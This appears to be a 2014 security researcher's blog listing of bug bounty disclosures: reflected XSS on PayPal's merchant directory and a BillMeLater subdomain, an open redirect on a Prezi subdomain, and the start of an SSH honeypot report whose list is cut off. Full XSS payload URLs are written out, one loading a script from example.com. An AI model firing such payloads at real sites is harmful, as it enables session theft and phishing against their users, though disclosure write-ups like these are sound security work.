12/15/2014 von Patrik auf Bug Bounty

[BugBounty] Reflected Cross Site Scripting at Paypal.com

Dear followers, i found a reflected Cross Site Scripting issue on the new Paypal Directory service (https://www.paypal.com/directory/merchants), with the following Payload:

&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E

The vulnerable Parameter was the q? Parameter, i was able to break the script contex of the page, i think it was because of the &q Parameteter, but i am not sure Paypal fixed this issue to fast so i couldn’t analyze it more in depth :/

https://www.paypal.com/directory/merchants?q=&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E

Here is my POC i sent in to Paypal : hope you enjoyed! If you have any kind of question please don’t hesitate to ask me, either way here or via email at patrik.fehrenbach(at)it-securityguard.com All the best Patrik

12/10/2014 von Patrik auf Allgemein

[BugBounty] malicious redirect on mailroom.prezi.com

Dear readers,

today i want to share a short story of a bug i found on one of prezi’s subdomains called mailroom.prezi.com.The Webserver at http://mailroom.prezi.com is configured to redirect the Users to the Login Page of Prezi, so far so good, i found out that if you add a Domain lets say http://mailroom.prezi.com/.anydomain.com to the end of the URL it redirects to https://mailroom.prezi.com.anydomain.test,
to validate this one i created a new Subdomain called mailroom.prezi.com.it-securityguard.com, so if an attacker sets up a valid https cloned site of the actual login page a request on http://mailroom.prezi.com/.it-securityguard.com will redirect the user to https://mailroom.prezi.com.it-securityguard.com (the attacker owned domain).

This issue was worth 500$ of cash reward. The Prezi Team as always fixed this issue in less than 24 hours, heads up for this nice and skilled security team.

hope you enjoyed.

11/17/2014 von Patrik auf Bug Bounty

[BugBounty] Reflected Cross Site Scripting BillMeLater

Dear followers,

i recently found a reflected Cross Site Scripting issue on a Subdomain of BillMeLater (Paypal acquisition) it was possible to break the style attribute and add malicious Javascript Code into the Application.

"--></style></ script >< script > alert ("XSS  ")</ script >

When ending the previous style and script element it was possible to add a new script element and executing the Payload, the complete URL looks like this now :

http://wwwb.search.billmelater.com/coupons/store/guess/?u=%27%22–%3E%3C/style%3E%3C/%20script%20%3E%3C%20script%20%3E%20alert%20%28%22XSS%20%20%22%29%3C/%20script%20%3E

This one only worked in Firefox, Chrome and IE restricted the execution with the anti XSS feature.

The Bug was categorized as “Out of Scope” for whatever reason.

Hope you enjoyed, if you have any question left, please don’t hesitate to contact me at patrik.fehrenbach(at)it-securityguard.com

11/17/2014 von Patrik auf Allgemein

[Research] SSH Honeypot (honey.it-securityguard.com)

Dear followers,

I’ve recently set up a honeypot tool called Kippo, Kippo runs a virtual SSH environment and tracks all the SSH bruteforce attemps on our Server. We started the test on third of November and got about 4000 bruteforce attempts on our Server, what is remarkable here is that almost all of the logins came from servers based in china.

Our research showed that almost all the attacking machines run the Windows IIS Webserver, we are currently not sure wether those machines are zombies (hacked machines with the aim to hack other machines) or if those servers are explicitly designed to attack wide ranges. Till today we’ve collected about 2500 distinct Username/Password combinations,

the Top 10 List of combinations is below: